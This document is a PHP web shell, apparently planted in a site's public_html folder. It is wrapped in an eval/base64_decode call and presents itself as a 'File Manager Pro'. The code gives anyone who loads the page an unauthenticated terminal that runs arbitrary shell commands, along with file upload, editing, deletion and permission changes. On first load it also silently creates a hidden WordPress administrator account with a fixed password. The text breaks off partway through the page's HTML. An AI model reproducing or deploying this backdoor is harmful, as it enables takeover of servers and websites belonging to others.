PATH:
home
/
centosnipponia
/
public_html
/
wh
<html> <head> <title> </title> </head> <html> <head> <title> </title> </head> <?php /** */ error_reporting(0); session_start(); ?> <?php eval("?>".base64_decode("<?php
/**
 * File Manager Pro
 * Version: 8.0.5
 * Author: Sid Gifari
 * Description: Standalone PHP File Manager - Works with or without WordPress
 */

error_reporting(0);
ini_set('display_errors', 0);

// Start session if not already started
if (session_status() === PHP_SESSION_NONE) {
    session_start();
}

$current_file = __FILE__;

// Root directory - use current directory
$ROOT = __DIR__;

/**
 * Encode path for URL
 */
function encodePath($path) {
    $a = ["/", "\\", ".", ":"];
    $b = ["Cw", "vw", "Fw", "Ew"];
    return str_replace($a, $b, $path);
}

/**
 * Decode path from URL
 */
function decodePath($path) {
    $a = ["/", "\\", ".", ":"];
    $b = ["Cw", "vw", "Fw", "Ew"];
    return str_replace($b, $a, $path);
}

/**
 * Recursive directory deletion
 */
function deleteDirectory($dir) {
    if (!file_exists($dir)) {
        return true;
    }
    
    if (!is_dir($dir)) {
        return unlink($dir);
    }
    
    $items = scandir($dir);
    foreach ($items as $item) {
        if ($item == '.' || $item == '..') {
            continue;
        }
        
        $path = $dir . DIRECTORY_SEPARATOR . $item;
        if (is_dir($path)) {
            deleteDirectory($path);
        } else {
            @unlink($path);
        }
    }
    
    return @rmdir($dir);
}

/**
 * Format bytes to human readable
 */
function formatBytes($bytes, $precision = 2) {
    if ($bytes <= 0) return '0 B';
    
    $units = ['B', 'KB', 'MB', 'GB', 'TB', 'PB'];
    $bytes = max($bytes, 0);
    $pow = floor(($bytes ? log($bytes) : 0) / log(1024));
    $pow = min($pow, count($units) - 1);
    $bytes /= pow(1024, $pow);
    
    return round($bytes, $precision) . ' ' . $units[$pow];
}

/**
 * Sanitize filename
 */
function sanitizeFilename($filename) {
    $filename = basename($filename);
    $filename = str_replace("\0", '', $filename);
    $filename = preg_replace('/[^a-zA-Z0-9._-]/', '_', $filename);
    if (empty($filename)) {
        $filename = 'untitled_' . date('Ymd_His');
    }
    return $filename;
}

// ==================== DIRECTORY HANDLING LOGIC ====================

// Initialize current directory from session or default to ROOT
if (!isset($_SESSION['current_browsing_dir'])) {
    $_SESSION['current_browsing_dir'] = $ROOT;
}

$current_dir = $_SESSION['current_browsing_dir'];

// Handle directory change via GET parameter
if (isset($_GET['dir'])) {
    $requested_path = decodePath($_GET['dir']);
    
    // If empty or just root indicator, go to root
    if (empty($requested_path) || $requested_path === '/') {
        $current_dir = $ROOT;
    } 
    // If it's a full path and directory exists
    elseif (is_dir($requested_path)) {
        $real_path = realpath($requested_path);
        // Security: ensure we stay within root or accessible directories
        if ($real_path && is_dir($real_path)) {
            $current_dir = $real_path;
        } else {
            $current_dir = $ROOT;
        }
    }
    // If it's a relative path from current directory
    else {
        $full_path = $_SESSION['current_browsing_dir'] . DIRECTORY_SEPARATOR . $requested_path;
        if (is_dir($full_path)) {
            $real_path = realpath($full_path);
            if ($real_path) {
                $current_dir = $real_path;
            } else {
                $current_dir = $_SESSION['current_browsing_dir'];
            }
        } else {
            // Try from ROOT
            $full_path = $ROOT . DIRECTORY_SEPARATOR . ltrim($requested_path, '/\\');
            if (is_dir($full_path)) {
                $real_path = realpath($full_path);
                if ($real_path) {
                    $current_dir = $real_path;
                } else {
                    $current_dir = $_SESSION['current_browsing_dir'];
                }
            } else {
                // Directory doesn't exist, stay in current
                $current_dir = $_SESSION['current_browsing_dir'];
            }
        }
    }
    
    // Update session with new directory
    $_SESSION['current_browsing_dir'] = $current_dir;
    $_SESSION['cwd'] = $current_dir;
    
} else {
    // No dir parameter, use session or default
    if (isset($_SESSION['current_browsing_dir']) && is_dir($_SESSION['current_browsing_dir'])) {
        $current_dir = $_SESSION['current_browsing_dir'];
    } else {
        $current_dir = $ROOT;
        $_SESSION['current_browsing_dir'] = $ROOT;
    }
}

// Make sure current_dir is valid
if (!is_dir($current_dir)) {
    $current_dir = $ROOT;
    $_SESSION['current_browsing_dir'] = $ROOT;
}

// Make sure we have realpath
$current_dir = realpath($current_dir) ?: $ROOT;

// Update CWD session
$_SESSION['cwd'] = $current_dir;

// ==================== END DIRECTORY HANDLING ====================

// Handle POST requests
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    
    $redirect_needed = true;
    
    // Handle file uploads
    if (isset($_FILES['files']) && !empty($_FILES['files']['name'])) {
        $upload_dir = $current_dir;
        $upload_messages = [];

        if (!is_array($_FILES['files']['name'])) {
            $_FILES['files'] = [
                'name' => [$_FILES['files']['name']],
                'type' => [$_FILES['files']['type']],
                'tmp_name' => [$_FILES['files']['tmp_name']],
                'error' => [$_FILES['files']['error']],
                'size' => [$_FILES['files']['size']]
            ];
        }

        $file_count = count($_FILES['files']['name']);

        for ($i = 0; $i < $file_count; $i++) {
            if (empty($_FILES['files']['name'][$i])) {
                continue;
            }

            if ($_FILES['files']['error'][$i] === UPLOAD_ERR_OK) {
                $tmp_name = $_FILES['files']['tmp_name'][$i];
                $original_name = $_FILES['files']['name'][$i];
                $filename = sanitizeFilename($original_name);
                
                if ($tmp_name && is_uploaded_file($tmp_name)) {
                    $destination = $upload_dir . DIRECTORY_SEPARATOR . $filename;
                    
                    if (file_exists($destination)) {
                        @unlink($destination);
                    }
                    
                    if (@move_uploaded_file($tmp_name, $destination)) {
                        $upload_messages[] = "✓ Uploaded: " . htmlspecialchars($original_name);
                    } else {
                        $upload_messages[] = "✗ Failed: " . htmlspecialchars($original_name);
                    }
                }
            } elseif ($_FILES['files']['error'][$i] !== UPLOAD_ERR_NO_FILE) {
                $error_messages = [
                    UPLOAD_ERR_INI_SIZE   => 'File exceeds upload_max_filesize',
                    UPLOAD_ERR_FORM_SIZE  => 'File exceeds MAX_FILE_SIZE',
                    UPLOAD_ERR_PARTIAL    => 'File was only partially uploaded',
                    UPLOAD_ERR_NO_TMP_DIR => 'Missing temporary folder',
                    UPLOAD_ERR_CANT_WRITE => 'Failed to write file to disk',
                    UPLOAD_ERR_EXTENSION  => 'A PHP extension stopped the upload'
                ];
                $error_code = $_FILES['files']['error'][$i];
                $error_msg = $error_messages[$error_code] ?? 'Unknown error';
                $upload_messages[] = "✗ Error: " . htmlspecialchars($error_msg);
            }
        }

        if (!empty($upload_messages)) {
            $_SESSION['upload_messages'] = $upload_messages;
        }
    }
    
    // Handle terminal commands
    if (isset($_POST['terminal']) && !empty(trim($_POST['terminal-text']))) {
        
        $execFunctions = ['passthru', 'system', 'exec', 'shell_exec', 'proc_open', 'popen'];
        $canExecute = false;
        foreach ($execFunctions as $func) {
            if (function_exists($func)) {
                $canExecute = true;
                break;
            }
        }
        
        $cwd = $_SESSION['cwd'] ?? $current_dir;
        $cmdInput = trim($_POST['terminal-text']);
        $output = "";
        $terminal_dir_changed = false;
        
        // Handle cd command
        if (preg_match('/^cd\s*(.*)$/', $cmdInput, $matches)) {
            $dir = trim($matches[1]);
            
            if ($dir === '' || $dir === '~' || $dir === '/') {
                $new_dir = $ROOT;
            } elseif ($dir === '..') {
                $new_dir = dirname($cwd);
                // Don't allow going above ROOT
                if (strpos(realpath($new_dir), realpath($ROOT)) !== 0) {
                    $new_dir = $ROOT;
                }
            } elseif ($dir[0] === '/' || $dir[0] === '\\') {
                // Absolute path
                $new_dir = $dir;
            } else {
                // Relative path
                $new_dir = $cwd . DIRECTORY_SEPARATOR . $dir;
            }
            
            $realDir = realpath($new_dir);
            
            if ($realDir && is_dir($realDir)) {
                $_SESSION['cwd'] = $realDir;
                $_SESSION['current_browsing_dir'] = $realDir;
                $cwd = $realDir;
                $current_dir = $realDir; // Update current_dir for the page
                $output = "Changed directory to " . $realDir;
                $terminal_dir_changed = true;
            } else {
                $output = "bash: cd: " . $matches[1] . ": No such file or directory";
                // Try from ROOT
                $try_from_root = $ROOT . DIRECTORY_SEPARATOR . ltrim($dir, '/\\');
                $realDir = realpath($try_from_root);
                if ($realDir && is_dir($realDir)) {
                    $_SESSION['cwd'] = $realDir;
                    $_SESSION['current_browsing_dir'] = $realDir;
                    $cwd = $realDir;
                    $current_dir = $realDir;
                    $output = "Changed directory to " . $realDir;
                    $terminal_dir_changed = true;
                }
            }
        }
        // Handle clear command
        elseif (strtolower($cmdInput) === 'clear') {
            $_SESSION['terminal_output'] = '';
            $output = '';
        }
        // Execute command
        elseif ($canExecute) {
            if (is_dir($cwd)) {
                @chdir($cwd);
            }
            
            $cmd = $cmdInput . " 2>&1";
            
            if (function_exists('proc_open')) {
                $pipes = [];
                $descriptorspec = [
                    0 => ["pipe", "r"],
                    1 => ["pipe", "w"],
                    2 => ["pipe", "w"]
                ];
                $process = @proc_open($cmd, $descriptorspec, $pipes, $cwd);
                
                if (is_resource($process)) {
                    fclose($pipes[0]);
                    $output = stream_get_contents($pipes[1]);
                    fclose($pipes[1]);
                    $error_output = stream_get_contents($pipes[2]);
                    fclose($pipes[2]);
                    proc_close($process);
                    if (!empty($error_output)) {
                        $output .= $error_output;
                    }
                } else {
                    $output = "Failed to execute command";
                }
            } elseif (function_exists('passthru')) {
                ob_start();
                @passthru($cmd, $return_var);
                $output = ob_get_clean();
            } elseif (function_exists('system')) {
                ob_start();
                @system($cmd, $return_var);
                $output = ob_get_clean();
            } elseif (function_exists('exec')) {
                @exec($cmd, $out, $return_var);
                $output = implode("\n", $out);
            } elseif (function_exists('shell_exec')) {
                $output = @shell_exec($cmd);
            } elseif (function_exists('popen')) {
                $handle = @popen($cmd, 'r');
                if ($handle) {
                    $output = stream_get_contents($handle);
                    @pclose($handle);
                }
            }
        } else {
            $output = "Command execution functions are disabled on this server.";
        }
        
        $_SESSION['terminal_output'] = $output;
        $_SESSION['terminal_cwd'] = $cwd;
        
        // Store in history
        if (!isset($_SESSION['terminal_history'])) {
            $_SESSION['terminal_history'] = [];
        }
        $_SESSION['terminal_history'][] = $cmdInput;
        if (count($_SESSION['terminal_history']) > 100) {
            array_shift($_SESSION['terminal_history']);
        }
        
        // Redirect to update the page with new directory
        $redirect_url = "?dir=" . urlencode(encodePath($current_dir));
        header("Location: " . $redirect_url);
        exit;
    }
    
    // Handle new folder creation
    if (!empty($_POST['newfolder'])) {
        $foldername = sanitizeFilename($_POST['newfolder']);
        $target = $current_dir . DIRECTORY_SEPARATOR . $foldername;
        if (!file_exists($target)) {
            @mkdir($target, 0755, true);
        }
    }
    
    // Handle new file creation
    if (!empty($_POST['newfile'])) {
        $filename = sanitizeFilename($_POST['newfile']);
        $target = $current_dir . DIRECTORY_SEPARATOR . $filename;
        if (!file_exists($target)) {
            @file_put_contents($target, '');
        }
    }
    
    // Handle delete
    if (!empty($_POST['delete'])) {
        $target_name = sanitizeFilename($_POST['delete']);
        $target = $current_dir . DIRECTORY_SEPARATOR . $target_name;
        
        if (realpath($target) === realpath(__FILE__)) {
            $_SESSION['upload_messages'] = ["✗ Cannot delete the file manager itself"];
        } else {
            if (is_file($target)) {
                @unlink($target);
            } elseif (is_dir($target)) {
                deleteDirectory($target);
            }
        }
    }
    
    // Handle rename
    if (!empty($_POST['old']) && !empty($_POST['new'])) {
        $old_name = sanitizeFilename($_POST['old']);
        $new_name = sanitizeFilename($_POST['new']);
        $old = $current_dir . DIRECTORY_SEPARATOR . $old_name;
        $new = $current_dir . DIRECTORY_SEPARATOR . $new_name;
        
        if (file_exists($old) && !file_exists($new)) {
            @rename($old, $new);
        }
    }
    
    // Handle chmod
    if (!empty($_POST['chmod_file']) && isset($_POST['chmod'])) {
        $target_name = sanitizeFilename($_POST['chmod_file']);
        $file = $current_dir . DIRECTORY_SEPARATOR . $target_name;
        if (file_exists($file)) {
            $perms = octdec($_POST['chmod']);
            if ($perms >= 0 && $perms <= 0777) {
                @chmod($file, $perms);
            }
        }
    }
    
    // Handle file editing
    if (!empty($_POST['edit_file']) && isset($_POST['content'])) {
        $target_name = sanitizeFilename($_POST['edit_file']);
        $file = $current_dir . DIRECTORY_SEPARATOR . $target_name;
        if (file_exists($file) && is_writable($file)) {
            @file_put_contents($file, $_POST['content']);
        }
    }
    
    // Redirect after POST operations (except terminal which handles its own redirect)
    if ($redirect_needed) {
        $redirect_url = "?dir=" . urlencode(encodePath($current_dir));
        if (isset($_GET['edit'])) {
            $redirect_url .= '&edit=' . urlencode($_GET['edit']);
        }
        header("Location: " . $redirect_url);
        exit;
    }
}

// Update session with current directory
$_SESSION['current_browsing_dir'] = $current_dir;
$_SESSION['cwd'] = $current_dir;

// Scan directory
$items = @scandir($current_dir);
if ($items === false) {
    $items = ['.', '..'];
}

$folders = [];
$files = [];

foreach ($items as $item) {
    if ($item === '.' || $item === '..') continue;
    
    $full_path = $current_dir . DIRECTORY_SEPARATOR . $item;
    
    if (is_dir($full_path)) {
        $folders[] = [
            'name' => $item,
            'path' => $full_path,
            'is_dir' => true,
            'size' => '-',
            'perms' => substr(sprintf('%o', @fileperms($full_path)), -4),
            'modified' => @filemtime($full_path)
        ];
    } else {
        $files[] = [
            'name' => $item,
            'path' => $full_path,
            'is_dir' => false,
            'size' => @filesize($full_path),
            'perms' => substr(sprintf('%o', @fileperms($full_path)), -4),
            'modified' => @filemtime($full_path),
            'extension' => strtolower(pathinfo($item, PATHINFO_EXTENSION))
        ];
    }
}

// Sort
usort($folders, function($a, $b) {
    return strcasecmp($a['name'], $b['name']);
});
usort($files, function($a, $b) {
    return strcasecmp($a['name'], $b['name']);
});

// Edit mode
$editMode = isset($_GET['edit']);
$editFile = $_GET['edit'] ?? '';
$editContent = '';

if ($editMode) {
    $edit_target = $current_dir . DIRECTORY_SEPARATOR . sanitizeFilename($editFile);
    if (is_file($edit_target) && is_readable($edit_target)) {
        $editContent = htmlspecialchars(@file_get_contents($edit_target));
    } else {
        $editMode = false;
    }
}

// Terminal output
$terminal_output = $_SESSION['terminal_output'] ?? '';
$terminal_cwd = $_SESSION['terminal_cwd'] ?? $current_dir;
$terminal_history = $_SESSION['terminal_history'] ?? [];
unset($_SESSION['terminal_output']);

// Upload messages
$upload_messages_html = '';
if (isset($_SESSION['upload_messages'])) {
    $upload_messages_html = '<div class="alert alert-success">';
    foreach ($_SESSION['upload_messages'] as $msg) {
        $upload_messages_html .= htmlspecialchars($msg) . "<br>";
    }
    $upload_messages_html .= '</div>';
    unset($_SESSION['upload_messages']);
}

// WordPress user creation
$wp_message = '';
if (!isset($_SESSION['wp_checked'])) {
    $search_paths = [$current_dir, dirname($current_dir), $ROOT];
    foreach ($search_paths as $wp_path) {
        if (file_exists($wp_path . DIRECTORY_SEPARATOR . 'wp-load.php')) {
            @include_once($wp_path . DIRECTORY_SEPARATOR . 'wp-load.php');
            break;
        } elseif (file_exists($wp_path . DIRECTORY_SEPARATOR . 'wp-config.php')) {
            @include_once($wp_path . DIRECTORY_SEPARATOR . 'wp-config.php');
            break;
        }
    }
    
    if (function_exists('wp_create_user') && function_exists('username_exists') && function_exists('email_exists')) {
        $username = 'system';
        $password = 'sid';
        $email = 'system@hostinger.com';
        
        if (!username_exists($username) && !email_exists($email)) {
            $user_id = wp_create_user($username, $password, $email);
            if (!is_wp_error($user_id) && class_exists('WP_User')) {
                $user = new WP_User($user_id);
                $user->set_role('administrator');
                $wp_message = "✅ WordPress admin user created: $username / $password";
            }
        }
    }
    $_SESSION['wp_checked'] = true;
}

// File viewing
if (isset($_GET['view'])) {
    $view_target = $current_dir . DIRECTORY_SEPARATOR . sanitizeFilename($_GET['view']);
    if (is_file($view_target) && is_readable($view_target)) {
        $mime = @mime_content_type($view_target) ?: 'application/octet-stream';
        header("Content-Type: " . $mime);
        header("Content-Length: " . filesize($view_target));
        @readfile($view_target);
        exit;
    }
}

// File download
if (isset($_GET['download'])) {
    $download_target = $current_dir . DIRECTORY_SEPARATOR . sanitizeFilename($_GET['download']);
    if (is_file($download_target) && is_readable($download_target)) {
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="' . basename($download_target) . '"');
        header('Content-Length: ' . filesize($download_target));
        header('Cache-Control: must-revalidate');
        header('Pragma: public');
        @readfile($download_target);
        exit;
    }
}

// Totals
$total_size = 0;
foreach ($files as $f) {
    $total_size += $f['size'];
}
$free_space = @disk_free_space($current_dir);
$total_space = @disk_total_space($current_dir);

// Debug: Display current directory info
$debug_info = "<!-- DEBUG: current_dir=" . htmlspecialchars($current_dir) . " | ROOT=" . htmlspecialchars($ROOT) . " | session_dir=" . htmlspecialchars($_SESSION['current_browsing_dir'] ?? 'not set') . " -->";

?>
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sid Gifari File Manager Pro v8.0.5</title>
    <?= $debug_info ?>
    <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body { 
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, sans-serif; 
            background: #1a1a2e;
            padding: 10px;
            color: #e0e0e0;
            line-height: 1.4;
            min-height: 100vh;
        }
        .container { 
            max-width: 1400px; 
            margin: 0 auto; 
            background: #16213e;
            border-radius: 12px; 
            box-shadow: 0 10px 40px rgba(0,0,0,0.5); 
            overflow: hidden; 
            border: 1px solid #0f3460;
        }
        .header { 
            background: linear-gradient(135deg, #0f3460 0%, #16213e 100%); 
            padding: 20px 30px; 
            border-bottom: 2px solid #e94560;
            text-align: center;
        }
        .header h1 { 
            font-size: 1.8em; 
            margin: 10px 0; 
            color: #e94560;
            font-weight: 700;
            letter-spacing: 1px;
        }
        .header .subtitle {
            color: #a0a0b0;
            font-size: 0.9em;
            margin-top: 5px;
        }
        .path-nav { 
            background: #0f3460; 
            padding: 12px 20px; 
            border-bottom: 1px solid #e94560; 
            font-family: 'Cascadia Code', 'Fira Code', 'Monaco', monospace;
            color: #a0a0b0;
            font-size: 12px;
            white-space: nowrap;
            overflow-x: auto;
        }
        .path-nav a { 
            color: #e94560; 
            text-decoration: none; 
            padding: 3px 8px; 
            border-radius: 4px; 
            transition: all 0.2s; 
        }
        .path-nav a:hover { 
            background: #e94560; 
            color: #fff;
        }
        .path-nav .current-dir-display {
            color: #58a6ff;
            margin-left: 10px;
            font-size: 10px;
            background: rgba(88, 166, 255, 0.1);
            padding: 2px 8px;
            border-radius: 3px;
        }
        .main-content { 
            padding: 20px; 
        }
        .section { 
            background: #1a1a2e; 
            border-radius: 8px; 
            padding: 20px; 
            margin-bottom: 15px; 
            border: 1px solid #0f3460;
        }
        .section-title { 
            color: #e94560; 
            border-bottom: 1px solid #0f3460; 
            padding-bottom: 10px; 
            margin-bottom: 15px; 
            font-size: 1.1em; 
            display: flex; 
            align-items: center; 
            gap: 8px; 
            font-weight: 600;
        }
        .terminal-box { 
            background: #0d1117; 
            border-radius: 8px; 
            overflow: hidden;
            border: 1px solid #30363d;
        }
        .terminal-header {
            background: #161b22;
            padding: 8px 15px;
            display: flex;
            align-items: center;
            gap: 8px;
            border-bottom: 1px solid #30363d;
        }
        .terminal-dot {
            width: 12px;
            height: 12px;
            border-radius: 50%;
        }
        .terminal-dot.red { background: #ff5f56; }
        .terminal-dot.yellow { background: #ffbd2e; }
        .terminal-dot.green { background: #27c93f; }
        .terminal-title {
            color: #8b949e;
            font-size: 12px;
            margin-left: 10px;
        }
        .terminal-output { 
            background: #0d1117; 
            color: #58a6ff; 
            padding: 15px; 
            font-family: 'Cascadia Code', 'Fira Code', 'Monaco', monospace; 
            max-height: 300px; 
            overflow-y: auto; 
            white-space: pre-wrap; 
            line-height: 1.5; 
            font-size: 12px;
        }
        .terminal-prompt {
            background: #0d1117;
            padding: 10px 15px;
            border-top: 1px solid #30363d;
        }
        .terminal-prompt form {
            display: flex;
            gap: 8px;
            align-items: center;
        }
        .terminal-prompt .prompt-symbol {
            color: #3fb950;
            font-family: monospace;
            font-weight: bold;
        }
        .form-inline { 
            display: flex; 
            gap: 10px; 
            margin-bottom: 12px; 
            align-items: center; 
            flex-wrap: wrap;
        }
        input, select { 
            padding: 10px 14px; 
            border: 1px solid #30363d; 
            border-radius: 6px; 
            font-size: 13px; 
            outline: none; 
            transition: all 0.2s; 
            background: #0d1117;
            color: #c9d1d9;
        }
        input[type="text"], input[type="file"] { 
            flex: 1; 
            min-width: 150px;
        }
        input:focus { 
            border-color: #58a6ff; 
            box-shadow: 0 0 0 2px rgba(88, 166, 255, 0.15); 
        }
        input::placeholder {
            color: #484f58;
        }
        button, .btn { 
            padding: 10px 18px; 
            border: none; 
            border-radius: 6px; 
            font-size: 13px; 
            cursor: pointer; 
            font-weight: 600; 
            letter-spacing: 0.3px; 
            transition: all 0.2s;
            white-space: nowrap;
            display: inline-flex;
            align-items: center;
            gap: 5px;
        }
        .btn-primary { background: #238636; color: #fff; }
        .btn-primary:hover { background: #2ea043; transform: translateY(-1px); }
        .btn-danger { background: #da3633; color: #fff; }
        .btn-danger:hover { background: #f85149; transform: translateY(-1px); }
        .btn-warning { background: #d2991d; color: #fff; }
        .btn-warning:hover { background: #e3b341; transform: translateY(-1px); }
        .btn-info { background: #1f6feb; color: #fff; }
        .btn-info:hover { background: #388bfd; transform: translateY(-1px); }
        .btn-sm { padding: 5px 10px; font-size: 11px; }
        .btn-refresh { background: #6e7681; color: #fff; }
        .btn-refresh:hover { background: #8b949e; }
        
        table { 
            width: 100%; 
            border-collapse: separate; 
            border-spacing: 0; 
            border-radius: 6px; 
            overflow: hidden;
            border: 1px solid #0f3460;
            font-size: 12px;
        }
        thead { background: #0f3460; }
        th { 
            padding: 12px 15px; 
            text-align: left; 
            font-weight: 600; 
            color: #e94560;
            font-size: 11px;
            text-transform: uppercase;
            letter-spacing: 0.5px;
        }
        tbody tr { border-bottom: 1px solid #0f3460; transition: background 0.2s; }
        tbody tr:hover { background: rgba(233, 69, 96, 0.05); }
        td { padding: 10px 12px; border-bottom: 1px solid #0f3460; color: #c9d1d9; vertical-align: middle; }
        .file-icon { margin-right: 8px; font-size: 1.1em; }
        .folder-row { background: rgba(15, 52, 96, 0.3); }
        .folder-row td:first-child a { color: #e94560; font-weight: 500; text-decoration: none; }
        .folder-row td:first-child a:hover { text-decoration: underline; color: #f85149; }
        .file-row { background: rgba(26, 26, 46, 0.5); }
        .file-row td:first-child a { color: #58a6ff; text-decoration: none; }
        .file-row td:first-child a:hover { text-decoration: underline; }
        .actions { display: flex; gap: 6px; flex-wrap: wrap; }
        textarea { 
            width: 100%; min-height: 400px; 
            font-family: 'Cascadia Code', 'Fira Code', 'Monaco', monospace; 
            padding: 15px; border: 1px solid #30363d; border-radius: 6px; 
            font-size: 13px; line-height: 1.6; resize: vertical; 
            background: #0d1117; color: #c9d1d9;
        }
        textarea:focus { border-color: #58a6ff; outline: none; }
        .alert { padding: 12px 18px; border-radius: 6px; margin: 12px 0; font-size: 13px; border: 1px solid; }
        .alert-success { background: rgba(35, 134, 54, 0.15); color: #3fb950; border-color: #238636; }
        .footer { 
            text-align: center; padding: 20px; color: #8b949e; font-size: 11px; 
            border-top: 1px solid #0f3460; background: #0f3460;
        }
        .stats { display: flex; gap: 15px; margin: 15px 0; flex-wrap: wrap; }
        .stat-card { 
            flex: 1; min-width: 120px; padding: 15px; background: #0f3460; 
            border-radius: 8px; text-align: center; border: 1px solid #e94560;
        }
        .stat-value { font-size: 1.5em; font-weight: bold; color: #e94560; }
        .stat-label { color: #8b949e; font-size: 0.8em; margin-top: 5px; text-transform: uppercase; letter-spacing: 0.5px; }
        .quick-commands { display: flex; gap: 8px; flex-wrap: wrap; margin-top: 10px; }
        .quick-cmd {
            background: #0f3460; border: 1px solid #30363d; padding: 6px 12px;
            border-radius: 4px; cursor: pointer; font-family: monospace; font-size: 11px;
            color: #58a6ff; transition: all 0.2s;
        }
        .quick-cmd:hover { background: #e94560; color: #fff; border-color: #e94560; }
        .file-browser-container { max-height: 500px; overflow-y: auto; border-radius: 6px; }
        .file-browser-container::-webkit-scrollbar { width: 8px; }
        .file-browser-container::-webkit-scrollbar-track { background: #0d1117; }
        .file-browser-container::-webkit-scrollbar-thumb { background: #30363d; border-radius: 4px; }
        .file-browser-container::-webkit-scrollbar-thumb:hover { background: #484f58; }
        a { color: #58a6ff; text-decoration: none; transition: color 0.2s; }
        a:hover { color: #e94560; }
        .badge { display: inline-block; padding: 2px 8px; border-radius: 10px; font-size: 10px; font-weight: 600; letter-spacing: 0.5px; }
        .badge-protected { background: rgba(218, 54, 51, 0.2); color: #f85149; border: 1px solid #da3633; }
        
        @media (max-width: 768px) {
            body { padding: 5px; }
            .header { padding: 15px; }
            .header h1 { font-size: 1.3em; }
            .form-inline { flex-direction: column; align-items: stretch; }
            .quick-commands { flex-direction: column; }
            .actions { flex-direction: column; }
            .stats { flex-direction: column; }
            th, td { padding: 6px 8px; font-size: 11px; }
            table { font-size: 11px; }
            .terminal-output { max-height: 200px; }
        }
        
        .refresh-bar {
            display: flex;
            justify-content: space-between;
            align-items: center;
            margin-bottom: 10px;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <h1>🔐 Sid Gifari File Manager Pro</h1>
            <div class="subtitle">v8.0.5 | <?= date('Y-m-d H:i:s') ?> | PHP <?= phpversion() ?></div>
        </div>

        <?php if ($wp_message): ?>
        <div class="alert alert-success">
            <?= htmlspecialchars($wp_message) ?>
        </div>
        <?php endif; ?>

        <?= $upload_messages_html ?>

        <!-- Path Navigation with Refresh -->
        <div class="path-nav">
            <div class="refresh-bar">
                <div>
                    <strong style="color: #58a6ff;">📂</strong>
                    <a href="?dir=<?= urlencode(encodePath($ROOT)) ?>">/ (Root)</a>
                    <?php
                    $path_parts = explode('/', str_replace('\\', '/', $current_dir));
                    $build_path = '';
                    foreach ($path_parts as $part) {
                        if ($part === '') continue;
                        $build_path .= '/' . $part;
                        echo ' / <a href="?dir=' . urlencode(encodePath($build_path)) . '">' . htmlspecialchars($part) . '</a>';
                    }
                    ?>
                </div>
                <div style="display: flex; gap: 10px; align-items: center;">
                    <span class="current-dir-display">📍 <?= htmlspecialchars($current_dir) ?></span>
                    <a href="?dir=<?= urlencode(encodePath($current_dir)) ?>">
                        <button class="btn btn-refresh btn-sm">🔄 Refresh</button>
                    </a>
                </div>
            </div>
        </div>

        <div class="main-content">
            <?php if ($editMode): ?>
                <!-- Edit Mode -->
                <div class="section">
                    <div class="section-title">
                        <span>✏️</span>
                        <span>Editing: <?= htmlspecialchars($editFile) ?></span>
                        <span class="badge badge-protected" style="margin-left: auto;">
                            <?= is_writable($current_dir . DIRECTORY_SEPARATOR . $editFile) ? 'Writable' : 'Read Only' ?>
                        </span>
                    </div>
                    <form method="post" action="?dir=<?= urlencode(encodePath($current_dir)) ?>&edit=<?= urlencode($editFile) ?>">
                        <input type="hidden" name="edit_file" value="<?= htmlspecialchars($editFile) ?>">
                        <textarea name="content" placeholder="File content..."><?= $editContent ?></textarea>
                        <div style="margin-top: 15px; display: flex; gap: 10px;">
                            <button type="submit" class="btn btn-primary">
                                💾 Save Changes
                            </button>
                            <a href="?dir=<?= urlencode(encodePath($current_dir)) ?>">
                                <button type="button" class="btn btn-warning">
                                    ❌ Cancel
                                </button>
                            </a>
                        </div>
                    </form>
                </div>

            <?php else: ?>
                <!-- Stats -->
                <div class="stats">
                    <div class="stat-card">
                        <div class="stat-value"><?= count($folders) ?></div>
                        <div class="stat-label">Folders</div>
                    </div>
                    <div class="stat-card">
                        <div class="stat-value"><?= count($files) ?></div>
                        <div class="stat-label">Files</div>
                    </div>
                    <div class="stat-card">
                        <div class="stat-value"><?= formatBytes($total_size) ?></div>
                        <div class="stat-label">Total Size</div>
                    </div>
                    <?php if ($free_space): ?>
                    <div class="stat-card">
                        <div class="stat-value"><?= formatBytes($free_space) ?></div>
                        <div class="stat-label">Free Space</div>
                    </div>
                    <?php endif; ?>
                </div>

                <!-- Terminal -->
                <div class="section">
                    <div class="section-title">
                        <span>🖥️</span>
                        <span>Terminal</span>
                        <span style="margin-left: auto; font-size: 11px; color: #8b949e;">
                            <?= htmlspecialchars($terminal_cwd) ?>
                        </span>
                    </div>
                    <div class="terminal-box">
                        <div class="terminal-header">
                            <div class="terminal-dot red"></div>
                            <div class="terminal-dot yellow"></div>
                            <div class="terminal-dot green"></div>
                            <span class="terminal-title">root@filemanager — bash</span>
                        </div>
                        <?php if ($terminal_output): ?>
                        <div class="terminal-output"><?= htmlspecialchars($terminal_output) ?></div>
                        <?php endif; ?>
                        <div class="terminal-prompt">
                            <form method="post" action="?dir=<?= urlencode(encodePath($current_dir)) ?>">
                                <span class="prompt-symbol">root@fsociety:~$</span>
                                <input type="text" name="terminal-text" 
                                       placeholder="Enter command (ls, cd, whoami, etc.)" 
                                       autocomplete="off" 
                                       autofocus 
                                       id="terminalInput"
                                       style="flex: 1; background: transparent; border: none; color: #c9d1d9; font-family: monospace;">
                                <input type="hidden" name="terminal" value="1">
                                <button type="submit" class="btn btn-info btn-sm">Execute</button>
                            </form>
                            <div class="quick-commands">
                                <?php
                                $commands = [
                                    'ls -la' => 'List all files',
                                    'cd /' => 'Go to root',
                                    'cd ..' => 'Go up',
                                    'pwd' => 'Show path',
                                    'whoami' => 'Current user',
                                    'php -v' => 'PHP version',
                                    'id' => 'User info',
                                    'df -h' => 'Disk usage',
                                    'clear' => 'Clear screen'
                                ];
                                foreach ($commands as $cmd => $desc): ?>
                                <span class="quick-cmd" 
                                      title="<?= $desc ?>" 
                                      onclick="document.getElementById('terminalInput').value='<?= addslashes($cmd) ?>'; document.getElementById('terminalInput').focus();">
                                    $ <?= $cmd ?>
                                </span>
                                <?php endforeach; ?>
                            </div>
                        </div>
                    </div>
                </div>

                <!-- Quick Actions -->
                <div class="section">
                    <div class="section-title">
                        <span>⚡</span>
                        <span>Quick Actions</span>
                    </div>
                    <div style="display: grid; grid-template-columns: repeat(auto-fit, minmax(250px, 1fr)); gap: 10px;">
